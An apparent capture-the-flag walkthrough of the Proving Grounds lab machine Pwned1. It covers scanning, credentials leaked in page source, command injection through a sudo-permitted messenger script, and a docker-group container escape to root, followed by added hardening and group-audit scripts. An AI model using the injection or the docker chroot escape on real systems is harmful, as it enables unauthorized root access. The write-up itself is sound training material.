OSCP - Proving Grounds - Pwned1

Key points

  • Viewing page source
  • Path enumeration (directory brute-forcing)
  • Privilege escalation via a special group

Steps

As usual, start with an Nmap scan: ports 21, 22 and 80 are open. Anonymous FTP login was tried and failed, so the focus turned to port 80.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 23:48 UTC
Nmap scan report for 192.168.54.95
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)

Not much information there.

So nikto next; it at least turned up a few paths: /nothing, /robots.txt and /hidden_text. Check each in turn.

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.54.95
+ Target Hostname:    192.168.54.95
+ Target Port:        80
+ Start Time:         2024-12-01 23:48:52 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nothing/: Directory indexing found.
+ /robots.txt: Entry '/nothing/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /hidden_text/: Directory indexing found.
+ /robots.txt: Entry '/hidden_text/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8104 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2024-12-01 23:49:12 (GMT0) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

/robots.txt simply lists the other two paths; /hidden_text is the useful one, as it contains a wordlist file named secret.dic. Using that file to brute-force paths turned up one directory.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.180.95
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                secret.dic
[+] Negative Status codes:   429,503,400,502,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/pwned.vuln           (Status: 301) [Size: 321] [--> http://192.168.180.95/pwned.vuln/]
Progress: 23 / 24 (95.83%)
===============================================================
Finished
===============================================================

It looks like a login page. Weak passwords were tried without success; viewing the page source revealed some code,

which contained a username and password, apparently for FTP.

With these credentials the FTP service can be logged into, and two files can be downloaded: an id_rsa key file and a note.txt, the latter containing a person's name.

Using that name as the username, the key logs in successfully over SSH.

C:\home\kali\Documents\OFFSEC\play\Pwn1> ssh -i id_rsa ariana@192.168.180.95
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec  2 05:46:05 2024 from 192.168.251.180
ariana@pwned:~$ id
uid=1000(ariana) gid=1000(ariana) groups=1000(ariana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
ariana@pwned:~$ 

sudo -l shows that ariana can run /home/messenger.sh as selena, so run it; for the message content, try command injection first.

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

selena's group turns out to be docker, which is notable: per GTFOBins, a user in the docker group can escalate to root.

ariana@pwned:~$ sudo -u selena /home/messenger.sh
ariana:
selena:
ftpuser:

Enter username to send message : ariana

Enter message for ariana :id

Sending message to ariana 
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

Message sent to ariana :) 
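The injection above works because the script hands the message text to the shell. The box's /home/messenger.sh is not shown on the page; the following is an added example (not the box's script) of how such a script can validate the recipient and deliver the message without ever re-parsing it, assuming a fixed user list that stands in for whatever the real script enumerates.

```shell
#!/bin/sh
# Hardened messenger pattern (added example, not Pwned1's /home/messenger.sh).
# Assumed root cause on the box: the message is expanded by the shell, so a
# message of "id" runs id as selena. Here the message is only ever a literal
# argument, and the recipient is checked against an allow-list.

# Constructed user list (assumption; mirrors the names printed by the script).
USERS="ariana selena ftpuser"

# Return 0 if $1 is a known user made only of [a-z0-9_-], else 1.
valid_user() {
    case "$1" in
        *[!a-z0-9_-]*|"") return 1 ;;
    esac
    for u in $USERS; do
        [ "$u" = "$1" ] && return 0
    done
    return 1
}

# Deliver a message: validate the recipient, then emit the text verbatim.
# printf '%s' never re-parses its argument, so "$(id)", ";" or "|" stay text.
send_message() {
    to="$1"
    msg="$2"
    valid_user "$to" || { echo "unknown user: $to" >&2; return 1; }
    printf 'Sending message to %s\n%s\n' "$to" "$msg"
}

# Demonstration on the same input that gave code execution on the box.
send_message ariana 'id'
```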


ariana@pwned:~$ sudo -u selena /home/messenger.sh
ariana:
selena:
ftpuser:

Enter username to send message : ariana

Enter message for ariana :docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Sending message to ariana 
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/proof.txt
2c37ee4169b5776588b7b9f3700356aa
# 
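Membership in the docker group is the whole escalation here: it is root on the host in everything but name. The audit below is an added example (not part of the original post) that flags every member of such groups in an /etc/group-format listing; the sample input is constructed to mirror the box, with docker's gid 115 taken from the id output above and the other ids made up.

```shell
#!/bin/sh
# Added audit example: report users who belong to groups whose membership is
# effectively root on a Linux host. The group list is an assumption; extend it
# to fit the environment (e.g. lxd on Ubuntu hosts).
RISKY_GROUPS="docker lxd disk adm sudo wheel"

# Constructed /etc/group sample modelled on Pwned1 (only docker=115 is from
# the page; the remaining gids are made up).
SAMPLE_GROUP='root:x:0:
sudo:x:27:
cdrom:x:24:ariana
docker:x:115:selena
ariana:x:1000:
selena:x:1001:
ftpuser:x:1002:'

# Read /etc/group-format lines on stdin; print "user group" for each member
# (4th field, comma-separated) of a risky group. Groups with no listed
# members produce nothing, so a clean host prints an empty result.
flag_risky_members() {
    awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN {
            n = split(risky, r, " ")
            for (i = 1; i <= n; i++) want[r[i]] = 1
        }
        ($1 in want) && $4 != "" {
            m = split($4, members, ",")
            for (i = 1; i <= m; i++) print members[i], $1
        }'
}

# Run against the constructed sample; on a real host use:
#   flag_risky_members < /etc/group
printf '%s\n' "$SAMPLE_GROUP" | flag_risky_members
```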
